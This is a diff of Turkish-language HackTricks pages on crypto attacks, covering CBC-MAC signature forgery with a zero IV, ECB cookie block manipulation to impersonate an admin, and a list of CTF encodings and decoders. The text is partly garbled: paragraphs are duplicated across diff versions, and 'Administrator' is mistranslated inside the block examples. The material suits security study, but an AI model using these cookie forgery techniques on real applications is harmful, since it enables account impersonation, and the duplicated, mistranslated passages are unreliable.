Mesaj m'nin CBC-MAC'ini hesaplamak için, m'yi sıfır başlangıç vektörü ile CBC modunda şifreler ve son bloğu saklar. Aşağıdaki şekil, bir mesajın bloklardan oluşan CBC-MAC'inin hesaplanmasını göstermektedir![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) gizli anahtar k ve blok şifresi E kullanılarak:
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
# Zafiyet
# Zayıflık
CBC-MAC ile genellikle kullanılan **IV 0'dır**.\
Bu bir sorundur çünkü bağımsız olarak bilinen 2 mesaj (`m1` ve `m2`), 2 imza (`s1` ve `s2`) oluşturur. Yani:
CBC-MAC ile genellikle **0 kullanılan IV**'dir.\
Bu bir problemdir çünkü 2 bilinen mesaj (`m1` ve `m2`) bağımsız olarak 2 imza (`s1` ve `s2`) oluşturacaktır. Bu durumda:
* `E(m1 XOR 0) = s1`
* `E(m2 XOR 0) = s2`
Sonra, m1 ve m2'nin birleştirildiği bir mesaj (m3), 2 imza (s31 ve s32) oluşturur:
Sonra m1 ve m2'nin birleştirilmiş olduğu bir mesaj (m3) 2 imza oluşturacaktır (s31 ve s32):
* `E(m1 XOR 0) = s31 = s1`
* `E(m2 XOR s1) = s32`
**Bu, şifrelemenin anahtarını bilmeden hesaplanabilir.**
**Bu, şifrenin anahtarını bilmeden hesaplanabilir.**
8 baytlık bloklar halinde **Yönetici** adını şifrelediğinizi hayal edin:
8 byte'lık bloklar halinde **Yönetici** adını şifrelediğinizi hayal edin:
* `Administ`
* `rator\00\00\00`
**Administ** (m1) adında bir kullanıcı adı oluşturabilir ve imzasını (s1) alabilirsiniz.\
Ardından, `rator\00\00\00 XOR s1 XOR 0`'ın sonucu olan bir kullanıcı adı oluşturabilirsiniz. Bu, `E(m2 XOR s1 XOR 0)`'i üretecektir ve bu da s32'yi oluşturur.\
Şimdi, s32'yi **Yönetici** adının imzası olarak kullanabilirsiniz.
**Administ** adında bir kullanıcı oluşturabilir ve imzasını (s1) alabilirsiniz.\
Sonra, `rator\00\00\00 XOR s1` işleminin sonucu olan bir kullanıcı adı oluşturabilirsiniz. Bu, s32 olan `E(m2 XOR s1 XOR 0)`'yi oluşturacaktır.\
şimdi, s32'yi **Yönetici** adının tam imzası olarak kullanabilirsiniz.
### Özet
1. Kullanıcı adı **Administ** (m1) imzasını (s1) alın
2. Kullanıcı adı **rator\x00\x00\x00 XOR s1 XOR 0**'ın imzasını (s32) alın.
1. Kullanıcı adı **Administ** (m1) için imzayı alın, bu s1'dir
2. Kullanıcı adı **rator\x00\x00\x00 XOR s1 XOR 0** için imzayı alın, bu s32'dir.
3. Çerezi s32 olarak ayarlayın ve bu, **Yönetici** kullanıcısı için geçerli bir çerez olacaktır.
# Saldırıyı Kontrol Eden IV
Eğer kullanılan IV'yi kontrol edebiliyorsanız, saldırı çok kolay olabilir.\
Eğer çerezler sadece şifrelenmiş kullanıcı adı ise, kullanıcıyı "**administrator**" olarak taklit etmek için kullanıcıyı "**Yönetici**" olarak oluşturabilir ve onun çerezini alabilirsiniz.\
Şimdi, IV'yi kontrol edebiliyorsanız, IV'nin ilk baytını değiştirebilirsiniz, böylece **IV\[0] XOR "A" == IV'\[0] XOR "a"** olur ve **Yönetici** kullanıcısı için çerezi yeniden oluşturabilirsiniz. Bu çerez, başlangıçtaki IV ile **administrator** kullanıcısını **taklit etmek** için geçerli olacaktır.
Kullanılan IV'yi kontrol edebiliyorsanız, saldırı çok kolay olabilir.\
Eğer çerez sadece şifrelenmiş kullanıcı adı ise, kullanıcıyı "**yönetici**" olarak taklit etmek için **Yönetici** kullanıcısını oluşturabilir ve onun çerezini alabilirsiniz.\
Şimdi, IV'yi kontrol edebiliyorsanız, IV'nin ilk Byte'ını değiştirebilirsiniz, böylece **IV\[0] XOR "A" == IV'\[0] XOR "a"** ve **Yönetici** kullanıcısı için çerezi yeniden oluşturabilirsiniz. Bu çerez, başlangıçtaki **IV** ile **yönetici** kullanıcısını **taklit etmek** için geçerli olacaktır.
## Referanslar
Daha fazla bilgi için [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) adresini ziyaret edin.
Daha fazla bilgi için [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** üzerinden bizi takip edin 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Crypto CTFs İpuçları
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.
* **Hacking ipuçlarınızı** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking ipuçlarını paylaşmak için PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulun.**
</details>
{% endhint %}
## Çevrimiçi Hash Veritabanları
@ -45,7 +46,7 @@ Kodlanmış verilerin çoğu bu 2 kaynakla çözülebilir:
### Yerine Koyma Otomatik Çözücüler
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
* [https://quipqiup.com/](https://quipqiup.com) - Çok iyi!
* [https://quipqiup.com/](https://quipqiup.com) - Çok iyi !
#### Caesar - ROTx Otomatik Çözücüler
@ -55,9 +56,9 @@ Kodlanmış verilerin çoğu bu 2 kaynakla çözülebilir:
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
### Temel Kodlama Otomatik Çözücüler
### Temel Kodlamalar Otomatik Çözücü
Tüm bu temel kodlamaları kontrol edin: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
Tüm bu tabanları kontrol et: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* **Ascii85**
* `BQ%]q@psCd@rH0l`
@ -97,7 +98,15 @@ Tüm bu temel kodlamaları kontrol edin: [https://github.com/dhondta/python-code
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
* `Xm4y|V{~Y+V}dF?`
* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\
* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
* `frDg[*jNN!7&BQM`
* **Base100** \[]
* `👟👦👣👘👚👘👩👘👚👦👣👘`
* **Base122** \[]
* `4F ˂r0Xmvc`
* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* `DmPsv8J7qrlKEoY7`
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
* `kLD8iwKsigSalLJ5`
@ -124,15 +133,13 @@ Tüm bu temel kodlamaları kontrol edin: [https://github.com/dhondta/python-code
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Bulunamadı: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### Morse
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Ölü: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Ölü: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Bulunamadı: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder
```
@ -145,7 +152,7 @@ end
```
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
### XXKodlayıcı
### XXEncoder
```
begin 644 webutils_pl
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
@ -156,15 +163,7 @@ end
### YEncoder
YEncoder, bazı web uygulamalarında kullanılan bir kodlama yöntemidir. Bu yöntem, özellikle veri gizleme veya veri aktarımı sırasında kullanılır. YEncoder, veriyi ASCII karakterlerine dönüştürerek ve bu karakterlerin değerlerini değiştirerek çalışır.
YEncoder'ın temel amacı, veriyi okunması zor hale getirmektir. Bu nedenle, veri şifrelenmez, sadece ASCII karakterlerine dönüştürülür ve karakter değerleri değiştirilir. Bu sayede, veri gizlenebilir ve aktarım sırasında güvenli hale getirilebilir.
YEncoder, genellikle web uygulamalarında kullanılan veri gizleme yöntemlerinden biridir. Bu yöntem, veri aktarımı sırasında verinin kolayca okunmasını engellemek için kullanılır. YEncoder'ın kullanımı, veri güvenliğini artırabilir ve saldırganların veriyi anlamasını zorlaştırabilir.
YEncoder'ın çalışma prensibi oldukça basittir. İlk olarak, veri ASCII karakterlerine dönüştürülür. Daha sonra, her bir karakterin değeri değiştirilir. Bu değişiklik, karakterlerin orijinal değerlerini korurken, verinin okunmasını zorlaştırır.
YEncoder'ın kullanımı oldukça yaygındır ve birçok web uygulamasında bulunabilir. Bu nedenle, bir web uygulamasını incelemek veya veri gizleme yöntemlerini anlamak için YEncoder hakkında bilgi sahibi olmak önemlidir.
### YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
ryvkryvkryvkryvkryvkryvkryvk
@ -173,10 +172,6 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
### BinHex
BinHex, a binary-to-text encoding scheme, is commonly used to convert binary files into ASCII text format. This encoding is often used to transfer files over email or other text-based protocols that do not support binary data. BinHex works by converting each byte of the binary file into a two-character ASCII representation.
To decode a BinHex-encoded file, you can use various tools and libraries available online. These tools will convert the ASCII representation back into the original binary format. It is important to note that BinHex is not a secure encryption method and should not be used for sensitive data.
```
(This file must be converted with BinHex 4.0)
:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
@ -185,10 +180,6 @@ To decode a BinHex-encoded file, you can use various tools and libraries availab
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85
ASCII85, ayrıca Base85 olarak da bilinir, 4 baytlık verileri ASCII karakterlerine dönüştürmek için kullanılan bir kodlama yöntemidir. Bu kodlama yöntemi, özellikle metin tabanlı dosyalarda veri sıkıştırma veya veri aktarımı için kullanılır. ASCII85, her 4 bayt veriyi 5 ASCII karakterine dönüştürür. Bu dönüşüm, verinin boyutunu azaltırken veri bütünlüğünü korur.
ASCII85 kodlamasını çözmek için birçok araç ve kütüphane bulunmaktadır. Bu araçlar, ASCII85 kodlamasını çözmek ve orijinal veriyi elde etmek için kullanılabilir.
```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
```
@ -202,11 +193,11 @@ drnajapajrna
### A1Z26
Harflerin sayısal değerlerine dönüşümü
Harflerinin sayısal değerlerine dönüştürülmesi
```
8 15 12 1 3 1 18 1 3 15 12 1
```
### Affine Şifreleme Kodu
### Affine Şifreleme
Harfi sayıya dönüştür `(ax+b)%26` (_a_ ve _b_ anahtarlarıdır ve _x_ harfidir) ve sonucu tekrar harfe dönüştür.
```
@ -214,15 +205,15 @@ krodfdudfrod
```
### SMS Kodu
**Multitap**, bir mobil [telefon tuş takımı](https://www.dcode.fr/phone-keypad-cipher) üzerindeki ilgili tuş koduna göre tekrarlanan rakamlarla bir harfi değiştirir (Bu mod, SMS yazarken kullanılır).\
**Çoklu dokunma** [bir harfi](https://www.dcode.fr/word-letter-change) mobil [telefon tuş takımı](https://www.dcode.fr/phone-keypad-cipher) üzerindeki karşılık gelen tuş kodu tarafından tanımlanan tekrarlanan rakamlarla değiştirir (Bu mod, SMS yazarken kullanılır).\
Örneğin: 2=A, 22=B, 222=C, 3=D...\
Bu kodu tanımlamanızı sağlayan şey, **tekrarlanan birkaç sayıyı** göreceğinizdir.
Bu kodu tanıyabilirsiniz çünkü\*\* tekrarlanan birkaç sayı göreceksiniz\*\*.
Bu kodu şurada çözebilirsiniz: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### Bacon Kodu
Her harfi 4 A veya B'ye (veya 1 ve 0'lara) yerine koyun.
Her harfi 4 A veya B (veya 1 ve 0) ile değiştirin
```
00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
@ -233,9 +224,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
## Sıkıştırma
**Raw Deflate** ve **Raw Inflate** (her ikisini de Cyberchef'te bulabilirsiniz), başlıklar olmadan verileri sıkıştırabilir ve açabilir.
**Ham Sıkıştırma** ve **Ham Genişletme** (her ikisini de Cyberchef'te bulabilirsiniz) verileri başlıksız sıkıştırabilir ve açabilir.
## Kolay Kripto
## Kolay Şifreleme
### XOR - Otomatik Çözücü
@ -243,13 +234,13 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
### Bifid
Bir anahtar kelime gereklidir.
Bir anahtar kelime gereklidir
```
fgaargaamnlunesuneoa
```
### Vigenere
Bir anahtar kelime gereklidir.
Bir anahtar kelimeye ihtiyaç vardır
```
wodsyoidrods
```
@ -257,7 +248,7 @@ wodsyoidrods
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## Güçlü Kriptografi
## Güçlü Şifreleme
### Fernet
@ -271,7 +262,7 @@ Key:
```
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
### Samir Gizli Paylaşımı
### Samir Gizli Paylaşım
Bir sır X parçaya bölünür ve onu kurtarmak için Y parçaya ihtiyacınız vardır (_Y <=X_).
```
@ -292,16 +283,17 @@ Bir sır X parçaya bölünür ve onu kurtarmak için Y parçaya ihtiyacınız v
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{% hint style="success" %}
AWS Hacking'ini öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ini öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'lar göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,92 +1,79 @@
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
# ECB
(ECB) Elektronik Kod Kitabı - her bir **açık metin bloğunu** **şifreli metin bloğuyla değiştiren** simetrik şifreleme şemasıdır. En **basit** şifreleme şemasıdır. Temel fikir, açık metni **N bitlik bloklara** (giriş veri bloğu boyutuna, şifreleme algoritmasına bağlı olarak) bölmek ve ardından yalnızca anahtar kullanarak her bir açık metin bloğunu şifrelemek (şifresini çözmek) için kullanmaktır.
(ECB) Elektronik Kod Kitabı - her **açık metin bloğunu** **şifreli blokla** **değiştiren** simetrik şifreleme şemasıdır. Bu, **en basit** şifreleme şemasıdır. Temel fikir, açık metni **N bitlik bloklara** (**giriş verisi bloğu boyutuna, şifreleme algoritmasına bağlı olarak**) bölmek ve ardından her açık metin bloğunu yalnızca anahtar kullanarak şifrelemektir (şifre çözmek).
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
ECB kullanmanın birden fazla güvenlik etkisi vardır:
ECB'nin kullanılmasının birden fazla güvenlik sonucu vardır:
* **Şifreli mesajdan bloklar çıkarılabilir**
* **Şifreli mesajdan bloklar yer değiştirebilir**
* **Şifreli mesajdan bloklar taşınabilir**
# Zafiyetin Tespiti
Bir uygulamaya birkaç kez giriş yaparsınız ve **her seferinde aynı çerez** alırsınız. Bu, uygulamanın çerezi **`<kullanıcı adı>|<parola>`** şeklindedir.\
Sonra, **aynı uzun parolaya** sahip **iki yeni kullanıcı** oluşturursunuz ve **neredeyse** **aynı** **kullanıcı adına** sahiptirler.\
Her iki kullanıcının bilgilerinin aynı olduğu **8B bloklarının eşit olduğunu** fark edersiniz. Bu durumda, bunun **ECB kullanıldığından** kaynaklanabileceğini düşünürsünüz.
Bir uygulamaya birkaç kez giriş yaparsınız ve **her zaman aynı çerez** alırsınız. Bu, uygulamanın çerezinin **`<kullanıcıadı>|<şifre>`** olduğu içindir.\
Sonra, **uzun şifreleri olan iki yeni kullanıcı oluşturursunuz** ve **neredeyse** **aynı** **kullanıcı adlarına** sahiptirler.\
Her iki kullanıcının bilgilerinin bulunduğu **8B'lik blokların** **aynı** olduğunu fark edersiniz. Bu durumun **ECB'nin kullanıldığını** gösterdiğini düşünürsünüz.
Aşağıdaki örnekte olduğu gibi. İki **çözülmüş çerezin** birden çok kez **`\x23U\xE45K\xCB\x21\xC8`** bloğuna sahip olduğunu gözlemleyin.
Aşağıdaki örnekte olduğu gibi. Bu **2 çözülmüş çerezin** **`\x23U\xE45K\xCB\x21\xC8`** bloğunun birkaç kez olduğunu gözlemleyin.
```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
```
Bu, çerezlerin kullanıcı adı ve şifresinin birkaç kez "a" harfi içerdiği anlamına gelir (örneğin). Farklı olan bloklar, en az 1 farklı karakter içeren bloklardır (belki de ayraç "|" veya kullanıcı adında gerekli farklılık gibi).
Bu, çerezlerin **kullanıcı adı ve şifresinin "a" harfini birkaç kez içerdiği** için oldu. **Farklı** olan bloklar, **en az 1 farklı karakter** içeren bloklardır (belki ayraç "|" veya kullanıcı adındaki bazı gerekli farklılık).
Şimdi, saldırgan sadece formatın `<kullanıcı adı><ayraç><şifre>` veya `<şifre><ayraç><kullanıcı adı>` olduğunu keşfetmesi gerekiyor. Bunun için, benzer ve uzun kullanıcı adları ve şifrelerle birkaç kullanıcı adı oluşturarak formatı ve ayraçın uzunluğunu bulana kadar deneyebilir:
Şimdi, saldırgan sadece formatın `<kullanıcı adı><ayraç><şifre>` veya `<şifre><ayraç><kullanıcı adı>` olduğunu keşfetmesi gerekiyor. Bunu yapmak için, **benzer ve uzun kullanıcı adları ve şifreler içeren birkaç kullanıcı adı oluşturarak formatı ve ayraç uzunluğunu bulana kadar deneme yapabilir:**
| Kullanıcı adı uzunluğu: | Şifre uzunluğu: | Kullanıcı adı+Şifre uzunluğu: | Çerezin uzunluğu (çözümlendikten sonra): |
| --------------------- | --------------- | --------------------------- | ------------------------------------- |
| Kullanıcı adı uzunluğu: | Şifre uzunluğu: | Kullanıcı adı+Şifre uzunluğu: | Çerez uzunluğu (çözümlendikten sonra): |
| ---------------------- | ---------------- | ---------------------------- | ------------------------------------- |
| 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 |
| 3 | 4 | 7 | 8 |
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
# Zafiyetin sömürülmesi
# Zafiyetin Sömürülmesi
Çerezin formatını (`<kullanıcı adı>|<şifre>`) bildiğimizde, `admin` kullanıcı adını taklit etmek için `aaaaaaaaadmin` adında yeni bir kullanıcı oluşturun ve çerezi alıp çözümleyin:
## Tüm blokların kaldırılması
Çerezin formatını bildiğimizde (`<kullanıcı adı>|<şifre>`), kullanıcı adını `admin` olarak taklit etmek için `aaaaaaaaadmin` adında yeni bir kullanıcı oluşturun, çerezi alın ve çözümleyin:
```
